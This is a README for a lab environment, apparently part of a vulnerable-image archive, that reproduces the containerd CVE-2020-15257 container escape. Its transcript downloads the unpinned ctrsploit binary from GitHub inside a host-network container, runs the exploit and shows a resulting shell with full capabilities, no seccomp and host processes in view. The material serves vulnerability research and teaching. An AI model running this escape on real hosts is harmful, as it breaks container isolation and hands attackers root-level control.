
containerd CVE-2020-15257

  • dqd:
    • ssst0n3/docker_archive:cve-2020-15257 -> ssst0n3/docker_archive:cve-2020-15257_v0.1.0
    • ssst0n3/docker_archive:cve-2020-15257_v0.1.0
  • ctr:
    • ssst0n3/docker_archive:ctr_cve-2020-15257 -> ssst0n3/docker_archive:ctr_cve-2020-15257_v0.1.0
    • ssst0n3/docker_archive:ctr_cve-2020-15257_v0.1.0

usage

$ cd vul/cve-2020-15257
$ docker compose -f docker-compose.yml -f docker-compose.kvm.yml up -d

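reproduce

Run this only inside the lab VM started in the usage step. The container is started with --net=host; sharing the host network namespace is what lets it reach containerd-shim's abstract unix socket (see the checksec line). The checks after the exploit step show that the resulting shell is not confined like the container: CapEff 0000003fffffffff is the full capability set on this kernel, Seccomp 0 means no seccomp filter is applied, the LSM label is unconfined, and ps lists host processes such as PID 1 systemd. The transcript fetches the latest ctrsploit release unpinned and unverified; for a repeatable lab, pin a release and check its checksum.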

$ ./ssh
root@localhost:~# docker run -ti --net=host busybox ash

/ # wget https://github.com/ctrsploit/ctrsploit/releases/latest/download/ctrsploit_linux_amd64 -O /usr/bin/ctrsploit
/ # chmod +x /usr/bin/ctrsploit
/ # ctrsploit vul CVE-2020-15257 checksec
[Y]  CVE-2020-15257	# Access containerd-shim's abstract unix socket when running in a container with host network namespace.
/ # ctrsploit vul cve-2020-15257 exploit -t
INFO[0000] connecting to /containerd-shim/9c26555c4f106b2659aef339d02a35172c10a4ddabbf43e884fd61bde37b475e.sock 
/ # grep CapEff /proc/self/status
grep CapEff /proc/self/status
CapEff:	0000003fffffffff
/ # grep Seccomp /proc/self/status
grep Seccomp /proc/self/status
Seccomp:	0
/ # cat /proc/self/attr/current
cat /proc/self/attr/current
unconfined
/ # ps -ef 
ps -ef 
PID   USER     TIME  COMMAND
    1 root      0:00 {systemd} /sbin/init
...
  676 root      0:00 docker run -ti --net=host busybox ash
  686 root      0:00 containerd-shim -namespace moby -workdir /var/lib/containe
  703 root      0:00 ash
...
 1188 root      0:00 ctrsploit vul cve-2020-15257 exploit -t
 1216 root      0:00 /bin/sh
 1231 root      0:00 [kworker/u4:3-ev]
 1233 root      0:00 ps -ef

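env details

Versions of the lab environment the transcript above was captured on; the containerd version listed under Server is the component this CVE concerns.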

$ ./ssh
root@localhost:~# docker version
Client: Docker Engine - Community
 Version:           19.03.13
 API version:       1.40
 Go version:        go1.13.15
 Git commit:        4484c46d9d
 Built:             Wed Sep 16 17:02:52 2020
 OS/Arch:           linux/amd64
 Experimental:      false

Server: Docker Engine - Community
 Engine:
  Version:          19.03.13
  API version:      1.40 (minimum version 1.12)
  Go version:       go1.13.15
  Git commit:       4484c46d9d
  Built:            Wed Sep 16 17:01:20 2020
  OS/Arch:          linux/amd64
  Experimental:     false
 containerd:
  Version:          1.3.7
  GitCommit:        8fba4e9a7d01810a393d5d25a3621dc101981175
 runc:
  Version:          1.0.0-rc10
  GitCommit:        dc9208a3303feef5b3839f4323d9beb36df0a9dd
 docker-init:
  Version:          0.18.0
  GitCommit:        fec3683
root@localhost:~# cat /etc/os-release 
NAME="Ubuntu"
VERSION="20.04.6 LTS (Focal Fossa)"
ID=ubuntu
ID_LIKE=debian
PRETTY_NAME="Ubuntu 20.04.6 LTS"
VERSION_ID="20.04"
HOME_URL="https://www.ubuntu.com/"
SUPPORT_URL="https://help.ubuntu.com/"
BUG_REPORT_URL="https://bugs.launchpad.net/ubuntu/"
PRIVACY_POLICY_URL="https://www.ubuntu.com/legal/terms-and-policies/privacy-policy"
VERSION_CODENAME=focal
UBUNTU_CODENAME=focal
root@localhost:~# uname -a
Linux localhost.localdomain 5.4.0-216-generic #236-Ubuntu SMP Fri Apr 11 19:53:21 UTC 2025 x86_64 x86_64 x86_64 GNU/Linux

build

make all DIR=vul/cve-2020-15257

for developers:

FROM ssst0n3/docker_archive:ctr_cve-2020-15257_v0.1.0